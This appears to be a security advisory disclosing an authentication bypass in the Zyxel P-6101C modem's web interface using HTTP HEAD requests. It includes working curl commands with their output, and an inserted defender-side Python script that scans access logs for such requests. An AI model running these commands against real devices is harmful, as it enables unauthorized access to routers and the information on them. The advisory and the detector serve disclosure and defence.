- Zyxel P-6101C
- Firmware Version P-6101CS6AP_20140331
- https://fcc.report/FCC-ID/I88P6101C/
The web (HTTP) interface of the Zyxel P-6101C modem allows an attacker to bypass authentication by using the HTTP HEAD method.
Exploitation requires sending a specially crafted packet.
No privileges required.
Confidentiality: High
Integrity: High
Availability: High
(9.8) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-863: Incorrect Authorization
Initially, a curl request sent without a password returns 401 Unauthorized.
curl <TARGET>
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY><H1>401 Unauthorized</H1>
Your client does not have permission to get URL /cgi-bin/index.asp from this server.
</BODY></HTML>
However, by sending the same request with the HEAD method, it is possible to bypass the authentication and retrieve sensitive information from the device.
curl -X HEAD <TARGET>
Warning: Setting custom HTTP method to HEAD with -X/--request may not work the
Warning: way you want. Consider using -I/--head instead.
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv=Content-Script-Type content=text/javascript>
<meta http-equiv=Content-Style-Type content=text/css>
</head>
<frameset rows="13%,87%">
<frame src="/cgi-bin/status.asp" name="header" frameborder="0" scrolling="NO" noresize="noresize">
<frameset cols="20%,80%">
<frame src="/cgi-bin/menu.asp" name="navigation" frameborder="0" id="panel" scrolling="NO" noresize="noresize">
<frame name="main"
src="/cgi-bin/status_deviceinfo.asp"
Device information can also be obtained by using the following command to download the page and then opening it in a browser.
curl -X HEAD <TARGET>/cgi-bin/status_deviceinfo.asp -o status_deviceinfo
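A defender-side detection sketch for the behaviour shown above, added here as an example and not part of the original advisory: it scans web access logs for unauthenticated HEAD requests that succeed on a path where another method was answered with 401, or that return a non-empty body. It assumes Common Log Format lines from a proxy or logger in front of the device, with the size field counting body bytes; the sample lines and the name `find_head_bypass` are constructed for illustration.

```python
import re

# Constructed sample lines in Common Log Format (not captured from a real device).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "GET /cgi-bin/index.asp HTTP/1.1" 401 187
192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "HEAD /cgi-bin/index.asp HTTP/1.1" 200 612
192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "HEAD /cgi-bin/status_deviceinfo.asp HTTP/1.1" 200 4096
198.51.100.7 - admin [01/Jan/2025:10:02:00 +0000] "GET /cgi-bin/status_deviceinfo.asp HTTP/1.1" 200 4096
198.51.100.7 - - [01/Jan/2025:10:03:00 +0000] "HEAD /favicon.ico HTTP/1.1" 200 0
"""

# Assumed layout: ip ident user [time] "METHOD path proto" status size
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
            yield rec

def find_head_bypass(log_text):
    """Return (ip, path, reasons) for unauthenticated HEAD requests that look like a bypass."""
    records = list(parse(log_text))
    # Paths refused with 401 for some other method are treated as auth-protected.
    protected = {r["path"] for r in records if r["method"] != "HEAD" and r["status"] == 401}
    findings = []
    for r in records:
        # Only successful HEAD requests with no authenticated user are of interest.
        if r["method"] != "HEAD" or r["user"] != "-" or not 200 <= r["status"] < 300:
            continue
        reasons = []
        if r["path"] in protected:
            reasons.append("protected-path")   # same path answered 401 to another method
        if r["size"] > 0:
            reasons.append("head-with-body")   # a HEAD response should carry no body
        if reasons:
            findings.append((r["ip"], r["path"], reasons))
    return findings

if __name__ == "__main__":
    for finding in find_head_bypass(SAMPLE_LOG):
        print(finding)
```

The `protected-path` rule only fires for paths that appear with a 401 in the same log window, so the `head-with-body` rule is what catches direct requests to pages such as `/cgi-bin/status_deviceinfo.asp`.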
- Chiao-Lin Yu (Steven Meow)
- 2024/10/